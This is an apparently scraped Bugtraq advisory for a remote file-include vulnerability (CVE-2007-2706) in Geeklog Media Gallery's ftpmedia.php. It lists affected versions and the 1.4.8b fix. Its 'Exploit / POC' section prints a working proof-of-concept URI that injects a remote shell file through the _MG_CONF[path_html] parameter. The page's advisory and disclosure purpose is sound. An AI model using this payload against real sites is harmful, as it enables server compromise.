Geeklog Media Gallery Ftpmedia.PHP Remote File Include Vulnerability
BID:23983
Info
Geeklog Media Gallery Ftpmedia.PHP Remote File Include Vulnerability
| Bugtraq ID: | 23983 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-2706 |
| Remote: | Yes |
| Local: | No |
| Published: | May 14 2007 12:00AM |
| Updated: | May 07 2015 05:39PM |
| Credit: | ThE TiGeR is credited with the discovery of this vulnerability. |
| Vulnerable: |
Geeklog Media Gallery 1.4.7 Geeklog Media Gallery 1.4.6 Geeklog Media Gallery 1.4.5 Geeklog Media Gallery 1.4.4 Geeklog Media Gallery 1.4.3 Geeklog Media Gallery 1.4.2 Geeklog Media Gallery 1.4.1 Geeklog Media Gallery 1.4.8a Geeklog Media Gallery 1.4 |
| Not Vulnerable: |
Geeklog Media Gallery 1.4.8b |
Discussion
Geeklog Media Gallery Ftpmedia.PHP Remote File Include Vulnerability
Geeklog Media Gallery is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Versions of Geeklog Media Gallery prior to 1.4.8b are vulnerable.
Geeklog Media Gallery is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Versions of Geeklog Media Gallery prior to 1.4.8b are vulnerable.
Exploit / POC
Geeklog Media Gallery Ftpmedia.PHP Remote File Include Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://example.com/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]= shell.txt?
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available:
http://example.com/mediagallery/public_html/maint/ftpmedia.php?_MG_CONF[path_html]= shell.txt?
Solution / Fix
Geeklog Media Gallery Ftpmedia.PHP Remote File Include Vulnerability
Solution:
The vendor has released version 1.4.8b to address these issues. Please see the references for more information.
Geeklog Media Gallery 1.4.8a
Geeklog Media Gallery 1.4
Geeklog Media Gallery 1.4.1
Geeklog Media Gallery 1.4.2
Geeklog Media Gallery 1.4.3
Geeklog Media Gallery 1.4.4
Geeklog Media Gallery 1.4.5
Geeklog Media Gallery 1.4.6
Geeklog Media Gallery 1.4.7
Solution:
The vendor has released version 1.4.8b to address these issues. Please see the references for more information.
Geeklog Media Gallery 1.4.8a
-
Geeklog mediagallery-1.4.8b-1.3.11.tar.gz
http://www.gllabs.org/filemgmt/visit.php?lid=115
Geeklog Media Gallery 1.4
-
Geeklog mediagallery-1.4.8b-1.3.11.tar.gz
http://www.gllabs.org/filemgmt/visit.php?lid=115
Geeklog Media Gallery 1.4.1
-
Geeklog mediagallery-1.4.8b-1.3.11.tar.gz
http://www.gllabs.org/filemgmt/visit.php?lid=115
Geeklog Media Gallery 1.4.2
-
Geeklog mediagallery-1.4.8b-1.3.11.tar.gz
http://www.gllabs.org/filemgmt/visit.php?lid=115
Geeklog Media Gallery 1.4.3
-
Geeklog mediagallery-1.4.8b-1.3.11.tar.gz
http://www.gllabs.org/filemgmt/visit.php?lid=115
Geeklog Media Gallery 1.4.4
-
Geeklog mediagallery-1.4.8b-1.3.11.tar.gz
http://www.gllabs.org/filemgmt/visit.php?lid=115
Geeklog Media Gallery 1.4.5
-
Geeklog mediagallery-1.4.8b-1.3.11.tar.gz
http://www.gllabs.org/filemgmt/visit.php?lid=115
Geeklog Media Gallery 1.4.6
-
Geeklog mediagallery-1.4.8b-1.3.11.tar.gz
http://www.gllabs.org/filemgmt/visit.php?lid=115
Geeklog Media Gallery 1.4.7
-
Geeklog mediagallery-1.4.8b-1.3.11.tar.gz
http://www.gllabs.org/filemgmt/visit.php?lid=115
References
Geeklog Media Gallery Ftpmedia.PHP Remote File Include Vulnerability
References:
References:
- Media Gallery Homepage (Geeklog)
- Security Vulnerability in Media Gallery v1.4x (Geeklog)